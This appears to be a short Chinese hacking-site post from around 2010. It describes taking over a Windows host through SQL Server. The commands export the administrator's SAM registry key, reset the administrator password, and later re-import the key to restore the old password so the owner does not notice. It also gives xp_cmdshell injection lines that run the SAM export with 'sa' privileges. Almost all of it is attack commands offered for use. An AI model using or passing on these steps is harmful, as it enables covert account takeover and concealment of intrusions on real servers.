首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
安全知识 :: 脚本攻防

导出管理员密码文件


http://www.gipsky.com/
sa默认可以读sam键.应该。

reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg

net user administrator test

用administrator登陆.

用完机器后

reg import c:\old.reg

根本不用克隆.

找到对应的sid.

/*不狐:这则经验非常不错,前面我做过一次渗透就没想到可以这样来!

默认情况下sa继承system权限,对sam键值有完全控制权限。



SQL代码

<OL class=dp-sql>

<LI class=alt>exec master..xp_cmdshell "reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg"-- </OL>

或者



SQL代码

<OL class=dp-sql>

<LI class=alt>exec master..xp_cmdshell "regedit -e C:\1.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4"-- </OL>

都是可行的。
<< 垃圾站究竟如何赚钱 从做垃圾站中慢慢长大 猫扑论坛遭遇黑客挂马 已过两日尚未解决 >>
API:
gipsky.com& 安信网络
网友个人意见,不代表本站立场。对于发言内容,由发表者自负责任。

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备05056747号